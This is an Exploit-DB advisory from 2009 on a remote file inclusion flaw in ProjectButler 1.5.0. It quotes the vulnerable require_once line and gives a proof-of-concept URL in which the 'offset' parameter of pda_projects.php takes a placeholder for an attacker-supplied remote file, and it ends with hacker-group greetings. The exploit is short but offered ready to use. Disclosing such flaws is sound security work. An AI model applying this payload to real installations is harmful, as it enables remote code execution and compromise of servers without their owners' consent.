ProjectButler 1.5.0 - 'pda_projects.php?offset' Remote File Inclusion

EDB-ID:

9331

Author:

cr4wl3r

Type:

webapps

Platform:

PHP

Published:

2009-08-03

#projectbutler - 1.5.0 (offset) RFI Vulnerability

#Author: cr4wl3r

#Contact: cr4wl3r[4t]linuxmail[dot]org

#Download: http://sourceforge.net/projects/projectbutler/files/projectbutler/1.5.0/ProjectButler.tar.gz

#Vuln : require_once($offset."class.project.inc");

#PoC :

http://localhost/[path]/pda/pda_projects.php?offset=[AvriLhea]

#Greetz : MyMom [alm]

#Special To : |CyberSufi| |CyberPeaCe| |AgenR@t| |Ea.ngel| |bl4ck.3n91n3| |Hmei7| |Dew0| |Anjas.chu'X| |Ridwan|              

              |Funky_sensey| |zvtral| |Is.bl4nk| |Y0ps.512mb| |Clif| |HaKu Frisca| |All cRew GoRonTaLo UnDeRgounD|
              |SunKetzu AbbaSSia| |iY0ng| |MaTr0| |deviln3t| |RyO| RaIs R0yaS| |Vel!x| |AnaK2 BolMonG| |MarLoN|

# milw0rm.com [2009-08-03]